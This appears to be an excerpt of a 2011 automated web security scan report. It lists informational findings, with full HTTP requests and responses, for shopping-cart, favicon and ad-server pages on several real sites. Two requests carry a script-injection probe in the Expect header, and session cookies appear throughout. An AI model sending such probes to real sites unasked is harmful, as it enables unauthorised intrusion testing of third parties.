...[SNIP]...
31.7. https://www.onlinemicrofiche.com/WPS/shoppingcart/checkout/Navigation.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.onlinemicrofiche.com
Path:   /WPS/shoppingcart/checkout/Navigation.asp

Request

GET /WPS/shoppingcart/checkout/Navigation.asp?Type=11 HTTP/1.1
Host: www.onlinemicrofiche.com
Connection: keep-alive
Referer: https://www.onlinemicrofiche.com/WPS/shoppingcart/checkout/Viewcart.asp?expand=1019
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQCSQTSDS=GJJKBIKAIMAAJLOHIEDJOHHE

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:21:53 GMT
Content-Length: 10284
Content-Type: text/html
Cache-control: private

   
<html>
<head>
<title>World of Powersports' Check Out Navigation</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.size1 {font-siz
...[SNIP]...
31.8. https://www.onlinemicrofiche.com/WPS/shoppingcart/checkout/Top.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.onlinemicrofiche.com
Path:   /WPS/shoppingcart/checkout/Top.htm

Request

GET /WPS/shoppingcart/checkout/Top.htm HTTP/1.1
Host: www.onlinemicrofiche.com
Connection: keep-alive
Referer: https://www.onlinemicrofiche.com/WPS/shoppingcart/checkout/Viewcart.asp?expand=1019
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQCSQTSDS=GJJKBIKAIMAAJLOHIEDJOHHE

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:20:00 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Fri, 04 Nov 2005 16:47:10 GMT
ETag: "658d6c665fe1c51:dd2"
Content-Length: 8659

<html><head>
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1
...[SNIP]...
31.9. https://www.onlinemicrofiche.com/WPS/shoppingcart/checkout/Viewcart.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.onlinemicrofiche.com
Path:   /WPS/shoppingcart/checkout/Viewcart.asp

Request

GET /WPS/shoppingcart/checkout/Viewcart.asp?expand=1019 HTTP/1.1
Host: www.onlinemicrofiche.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:19:39 GMT
Content-Length: 543
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQTSDS=PLJKBIKAHEBHCEPODDOPNNGN; path=/
Cache-control: private


<html>
<head>
<title>World of Powersports' Check Out</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<frameset rows="180,*" frameborder="No" border=
...[SNIP]...
31.10. https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CheckOut/Navigation.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.onlinemicrofiche.com
Path:   /xtremepowersports/shoppingcart/CheckOut/Navigation.asp

Request

GET /xtremepowersports/shoppingcart/CheckOut/Navigation.asp?Type=11 HTTP/1.1
Host: www.onlinemicrofiche.com
Connection: keep-alive
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CheckOut/Viewcart.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQCSQTSDS=HJJKBIKAPBNGOAEECGELJAAN

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:25:38 GMT
Content-Length: 7841
Content-Type: text/html
Cache-control: private

   
<html>
<head>
<title>Xtreme Powersports' Check Out Navigation</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<script language="JavaScript"
src="https://seal.
...[SNIP]...
31.11. https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CheckOut/Top.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.onlinemicrofiche.com
Path:   /xtremepowersports/shoppingcart/CheckOut/Top.htm

Request

GET /xtremepowersports/shoppingcart/CheckOut/Top.htm HTTP/1.1
Host: www.onlinemicrofiche.com
Connection: keep-alive
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CheckOut/Viewcart.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQCSQTSDS=HJJKBIKAPBNGOAEECGELJAAN

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:26:58 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Thu, 28 May 2009 18:29:21 GMT
ETag: "4ce86638c2dfc91:dd2"
Content-Length: 2762

<html>
<head>
<title>Xtreme Powersports' OEM Parts Finder Shopping Cart</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<body bgcolor="#FFFFFF" leftmarg
...[SNIP]...
31.12. https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CheckOut/Viewcart.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.onlinemicrofiche.com
Path:   /xtremepowersports/shoppingcart/CheckOut/Viewcart.asp

Request

GET /xtremepowersports/shoppingcart/CheckOut/Viewcart.asp HTTP/1.1
Host: www.onlinemicrofiche.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:21:43 GMT
Content-Length: 541
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQTSDS=MGKKBIKAJLALKLHMGNHCJDNK; path=/
Cache-control: private


<html>
<head>
<title>Xtreme Powersports' Check Out</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<frameset rows="180,*" frameborder="No" border="0
...[SNIP]...
31.13. https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/Shoppingcart/ProcessOrder.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.onlinemicrofiche.com
Path:   /xtremepowersports/shoppingcart/Shoppingcart/ProcessOrder.asp

Request

GET /xtremepowersports/shoppingcart/Shoppingcart/ProcessOrder.asp?Type=12 HTTP/1.1
Host: www.onlinemicrofiche.com
Connection: keep-alive
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CheckOut/Viewcart.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQCSQTSDS=HJJKBIKAPBNGOAEECGELJAAN

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:25:49 GMT
Content-Length: 6147
Content-Type: text/html
Cache-control: private

<html>
<head>
<title>Xtreme Powersports' Shoppingcart' Shopping Cart</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.size1 {font-s
...[SNIP]...
32. Multiple content types specified  previous  next
There are 2 instances of this issue:

32.1. http://www.convergedirect.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.convergedirect.com
Path:   /favicon.ico

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.convergedirect.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 1692
Content-Type: application/octet-stream
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:26:06 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 Page | Converge
...[SNIP]...
</title>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="robots" content="noindex" />
...[SNIP]...
32.2. http://www.procuts.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.procuts.com
Path:   /favicon.ico

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.procuts.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 11086
Content-Type: application/octet-stream
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:47:52 GMT

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<!--SS_BEGIN_SNIPPET(fragment1,1)-->
...[SNIP]...
33. HTML does not specify charset  previous  next
There are 92 instances of this issue:

33.1. http://ad.doubleclick.net/adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.11  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.11

Request

GET /adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.11;sz=300x250;dcopt=rcl;mtfIFPath=nofile;click=http://ads.bluelithium.com/clk?2,13%3B9696cce63f6aaabd%3B12fade8e939,0%3B%3B%3B4257954862,WaUDANGUGAASSlUAAAAAALwODwAAAAAAAgEAAAIAAAAAAP8AAAABE5OuAQAAAAAA8yMVAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC9JAIAAAAAAAIAAgAAAAAAOOnorS8BAAAAAAAAADY1OTczYzE2LTc0NGItMTFlMC1hMDlkLTAwMzA0OGQ2ZDJmZQA4nyoAAAA=,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15ps83od6%2FM%3D787833.14445110.14291877.12665044%2FD%3Dnews%2FS%3D96654906%3ALREC2%2FY%3DYAHOO%2FEXP%3D1304299983%2FL%3DBZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt%2FB%3DHqq_KEwNPVs-%2FJ%3D1304292783315180%2FK%3DmbmuBMnyuFXFamzNMr12dQ%2FA%3D6261233%2FR%3D0%2F%2A%24,http%3A%2F%2Fnews.yahoo.com%2Fs%2Fprweb%2F20110427%2Fbs_prweb%2Fprweb5276794,;ord=1304292813? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?WaUDANGUGAASSlUAAAAAALwODwAAAAAAAgEAAAIAAAAAAP8AAAABE5OuAQAAAAAA8yMVAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC9JAIAAAAAAAIAAgAAAAAAHLEWnwIAKEAcsRafAgAoQByxFp8CAChAHLEWnwIAKEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-dWh0P9IGCuCoJ9BtI0ZMuxgp1sWK95UJMhZwAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15ps83od6%2FM%3D787833.14445110.14291877.12665044%2FD%3Dnews%2FS%3D96654906%3ALREC2%2FY%3DYAHOO%2FEXP%3D1304299983%2FL%3DBZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt%2FB%3DHqq_KEwNPVs-%2FJ%3D1304292783315180%2FK%3DmbmuBMnyuFXFamzNMr12dQ%2FA%3D6261233%2FR%3D0%2F%2A%24,http%3A%2F%2Fnews.yahoo.com%2Fs%2Fprweb%2F20110427%2Fbs_prweb%2Fprweb5276794,_PVID%3DBZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt%26Z%3D300x250%26cb%3D1304292783315180%26x%3Dhttp%253A%252F%252Fglobal%252Eard%252Eyahoo%252Ecom%252FSIG%253D15ps83od6%252FM%253D787833%252E14445110%252E14291877%252E12665044%252FD%253Dnews%252FS%253D96654906%253ALREC2%252FY%253DYAHOO%252FEXP%253D1304299983%252FL%253DBZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt%252FB%253DHqq%255FKEwNPVs%252D%252FJ%253D1304292783315180%252FK%253DmbmuBMnyuFXFamzNMr12dQ%252FA%253D6261233%252FR%253D0%252F%252A%2524%26S%3D14445110%26i%3D140477%26D%3Dzip%253D05672%2526ycg%253D%2526yyob%253D%26_salt%3D3283334435%26B%3D10%26u%3Dhttp%253A%252F%252Fnews.yahoo.com%252Fs%252Fprweb%252F20110427%252Fbs_prweb%252Fprweb5276794%26r%3D0,65973c16-744b-11e0-a09d-003048d6d2fe
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 01 May 2011 23:34:26 GMT
Content-Length: 1180

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ads.bluelithium.com/clk?2,13%3B9696cce63f6aaa
...[SNIP]...
33.2. http://ad.doubleclick.net/adi/N3382.Yahoo/B5116950.16  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3382.Yahoo/B5116950.16

Request

GET /adi/N3382.Yahoo/B5116950.16;sz=150x30;pc=[TPAS_ID];click=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bWFsbTd1cChnaWQkQlpWSEZXS0lSbGlLUm1lWlRhdFBrUUMycmNIVzgwMjk3YThBQWlCdCxzdCQxMzA0MjkyNzgzMjE4Njc4LHNpJDQ0NjQwNTEsdiQxLjAsYWlkJGlGdWVGVXdON3k0LSxjdCQyNSx5YngkTE9UVjlha25jZmtCTDgzNVFtUmduUSxyJDAscmQkMTZpZmY1MGZtKSk/1/*http://global.ard.yahoo.com/SIG=15g2ds2nv/M=999999.999999.999999.999999/D=news/S=96654906:FB/Y=YAHOO/EXP=1304299983/L=BZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt/B=iFueFUwN7y4-/J=1304292783275135/K=mbmuBMnyuFXFamzNMr12dQ/A=2394450929415713467/R=0/X=6/*;dcopt=rcl;mtfIFPath=nofile;ord=1304292783.275135? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.yahoo.com/s/prweb/20110427/bs_prweb/prweb5276794
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 01 May 2011 23:33:30 GMT
Content-Length: 1041

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjA
...[SNIP]...
33.3. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.32  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.32

Request

GET /adi/N3941.InviteMedia/B5414127.32;sz=160x600;pc=[TPAS_ID];click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BNedOXxG-Te_sHMeXmgfvluHyCq3mhMIBhcPSjhf9072UVwAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi00Njc1MzY0ODUyMTA5MDg4oAGrl7rtA7IBEXd3dy5ncmVlbmh1bGsubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly93d3cuZ3JlZW5odWxrLm5ldC9mb3J1bXMvc2hvd3RocmVhZC5waHA_MTI2Mjg1LVJlYXItYm9hcmRpbmctc3RlcJgCyAbAAgXIApWysAuoAwHoA_QI6AORAugDL-gDFPUDAAEAxIAG_9qsrNmGuekT&num=1&sig=AGiWqtxGm_6Saz9O7PUXbCqI4ekaKkw5Fg&client=ca-pub-4675364852109088&adurl=http%3A%2F%2Fva.px.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJyrVjI2VrJSMDI1NDLTUVAyNgJyTC0NjcxNgTxDIEcpJMkkKKLc0cMv18LbNL_Moygnwyep3NZWCaQcpKA0LzsvvzwPxAfpNgHSpiAjjcwMgUwTIDOvNCcHyDQDMs2MLCwtawFithu3%26redirectURL%3D;ord=Tb4RXwAHNm8K5ovHrlhLbw==? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4675364852109088&output=html&h=600&slotname=7606683569&w=160&lmt=1304337917&flash=10.2.154&url=http%3A%2F%2Fwww.greenhulk.net%2Fforums%2Fshowthread.php%3F126285-Rear-boarding-step&dt=1304319912584&bpp=8&shv=r20110427&jsv=r20110427&prev_slotnames=8870801362%2C8870801362&correlator=1304319912561&frm=0&adk=645557951&ga_vid=1539471416.1304319910&ga_sid=1304319910&ga_hid=984664005&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&fu=0&ifi=3&dtd=5628&xpc=DefJdIvudC&p=http%3A//www.greenhulk.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 02:25:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8795

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
33.4. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Request

GET /iframe3?WaUDANGUGAASSlUAAAAAALwODwAAAAAAAgEAAAIAAAAAAP8AAAABE5OuAQAAAAAA8yMVAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC9JAIAAAAAAAIAAgAAAAAAHLEWnwIAKEAcsRafAgAoQByxFp8CAChAHLEWnwIAKEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-dWh0P9IGCuCoJ9BtI0ZMuxgp1sWK95UJMhZwAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15ps83od6%2FM%3D787833.14445110.14291877.12665044%2FD%3Dnews%2FS%3D96654906%3ALREC2%2FY%3DYAHOO%2FEXP%3D1304299983%2FL%3DBZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt%2FB%3DHqq_KEwNPVs-%2FJ%3D1304292783315180%2FK%3DmbmuBMnyuFXFamzNMr12dQ%2FA%3D6261233%2FR%3D0%2F%2A%24,http%3A%2F%2Fnews.yahoo.com%2Fs%2Fprweb%2F20110427%2Fbs_prweb%2Fprweb5276794,_PVID%3DBZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt%26Z%3D300x250%26cb%3D1304292783315180%26x%3Dhttp%253A%252F%252Fglobal%252Eard%252Eyahoo%252Ecom%252FSIG%253D15ps83od6%252FM%253D787833%252E14445110%252E14291877%252E12665044%252FD%253Dnews%252FS%253D96654906%253ALREC2%252FY%253DYAHOO%252FEXP%253D1304299983%252FL%253DBZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt%252FB%253DHqq%255FKEwNPVs%252D%252FJ%253D1304292783315180%252FK%253DmbmuBMnyuFXFamzNMr12dQ%252FA%253D6261233%252FR%253D0%252F%252A%2524%26S%3D14445110%26i%3D140477%26D%3Dzip%253D05672%2526ycg%253D%2526yyob%253D%26_salt%3D3283334435%26B%3D10%26u%3Dhttp%253A%252F%252Fnews.yahoo.com%252Fs%252Fprweb%252F20110427%252Fbs_prweb%252Fprweb5276794%26r%3D0,65973c16-744b-11e0-a09d-003048d6d2fe HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?_PVID=BZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt&ad_type=iframe&ad_size=300x250&site=140477&section_code=14445110&cb=1304292783315180&yud=zip%3D05672%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15ps83od6/M=787833.14445110.14291877.12665044/D=news/S=96654906:LREC2/Y=YAHOO/EXP=1304299983/L=BZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt/B=Hqq_KEwNPVs-/J=1304292783315180/K=mbmuBMnyuFXFamzNMr12dQ/A=6261233/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; pv1="b!!!!$!#M*E!,Y+@!$Xwq!/h[p!%:3<!!!!$!?5%!(/4f4!w1K*!%4fo!'i8L!'>d6~~~~~<vl)[<wjgu~!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~"; ih="b!!!!2!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!/Iw4!!!!#<wF]1!/_KY!!!!#<vl)T!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1`)_!!!!#<wYiT"; bh="b!!!$-!!!?H!!!!%<wR0_!!-?2!!!!#<xG3/!!-G2!!!!$<w[UB!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!#<xG3/!!0P,!!!!#<x4hf!!1Mv!!!!#<waw+!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!J<=!!!!)<wYiT!!J<E!!!!)<wYiT!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!'<xG3/!!PL`!!!!#<x@jG!!RZ(!!!!$<xD>X!!VQ(!!!!#<wYkr!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!*<wYiT!!q:E!!!!'<wYiT!!q<+!!!!(<wYiT!!q</!!!!(<wYiT!!q<3!!!!(<wYiT!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tjQ!!!!$<xG3/!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!'<xD>X!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2Rn!!!!#<x2wq!#2YX!!!!#<vl)_!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#4`K!!!!#<x2wq!#5(U!!!!#<x,:<!#5(V!!!!#<x31-!#5(W!!!!#<x3.t!#5([!!!!#<x,:<!#5(^!!!!#<x31-!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#6U!!!!!#<x,:<!#8>*!!!!#<x2wq!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTK!!!!#<w>/m!#M]c!!!!$<xD>X!#Mr7!!!!#<w>/l!#N44!!!!#<x2wq!#SCj!!!!'<xD>X!#SCk!!!!'<xD>X!#SEm!!!!)<wYiT!#SF3!!!!)<wYiT!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#UDP!!!!)<wYiT!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#VEP!!!!#<wleE!#XI8!!!!#<xL%*!#YCg!!!!#<x2wq!#[